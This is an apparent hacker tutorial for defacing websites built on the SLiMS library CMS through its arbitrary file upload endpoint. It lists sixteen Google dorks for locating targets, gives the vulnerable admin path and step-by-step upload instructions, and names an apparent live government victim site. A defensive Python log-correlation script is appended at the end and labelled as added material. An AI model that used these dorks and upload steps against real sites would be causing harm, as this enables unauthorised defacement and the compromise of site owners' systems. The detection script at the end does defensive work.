Deface PoC Exploit SLiMS CMS Arbitrary File Upload - W4FXploit


 Assalamualaikum bro

This time I want to show you how to

exploit the SLiMS CMS arbitrary file upload

*just look at the title, dammit

let's just go...


 What you need:

★ Dork : 

#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

 ★Exploit: /admin/modules/bibliography/pop_attach.php

★ Deface script : txt jpg png 

★ device 

[ STEP ]

1. First, dork using ONE of the dorks above and pick a target 

live target ? http://pn-tapaktuan.go.id/pustaka/admin/modules/bibliography/pop_attach.php ( after I added the exploit )

2. Append the exploit path to the end of the URL 

  *example : https://target.lu/Exploitnya

3. The page will then look like this


4. Click choose file and select your deface script

5. Then click upload...


How do you open it ?

https://Target.lu/repository/File.Lu

 *my example : http://pn-tapaktuan.go.id/pustaka/repository/Xp.txt

because my file is named Xp and its extension is txt
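
For defenders, the sequence described above (a POST to pop_attach.php followed by a request for the new file under /repository/) leaves a trace in web server access logs. The following is an added example, not part of the original post: it assumes Apache combined log format, and the sample log lines, the /library/ prefix, the IP addresses and the 15-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2021:10:01:02 +0000] "GET /library/admin/modules/bibliography/pop_attach.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2021:10:01:40 +0000] "POST /library/admin/modules/bibliography/pop_attach.php HTTP/1.1" 200 2544 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2021:10:02:00 +0000] "GET /library/repository/annual-report.pdf HTTP/1.1" 200 88112 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2021:10:02:05 +0000] "GET /library/repository/Xp.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2021:11:30:00 +0000] "GET /library/repository/other.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_SUFFIX = "/admin/modules/bibliography/pop_attach.php"  # path from the post
WINDOW = timedelta(minutes=15)  # assumed correlation window; tune per site


def find_upload_then_fetch(log_text):
    """Return (ip, upload_time, fetched_path) for each /repository/ fetch that
    follows a successful POST to pop_attach.php from the same client."""
    last_upload = {}  # ip -> time of most recent successful upload POST
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore the query string
        ok = m["status"].startswith("2")
        if m["method"] == "POST" and path.endswith(UPLOAD_SUFFIX) and ok:
            last_upload[m["ip"]] = ts
        elif m["method"] == "GET" and "/repository/" in path and ok:
            up = last_upload.get(m["ip"])
            if up is not None and ts - up <= WINDOW:
                hits.append((m["ip"], up.isoformat(), path))
    return hits


if __name__ == "__main__":
    for ip, when, path in find_upload_then_fetch(SAMPLE_LOG):
        print(f"{ip} uploaded at {when}, then fetched {path}")
```

Any hit from a client that is not a known librarian workstation is worth reviewing, together with the files currently present in the repository directory.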



[ Done ]

#happy learn
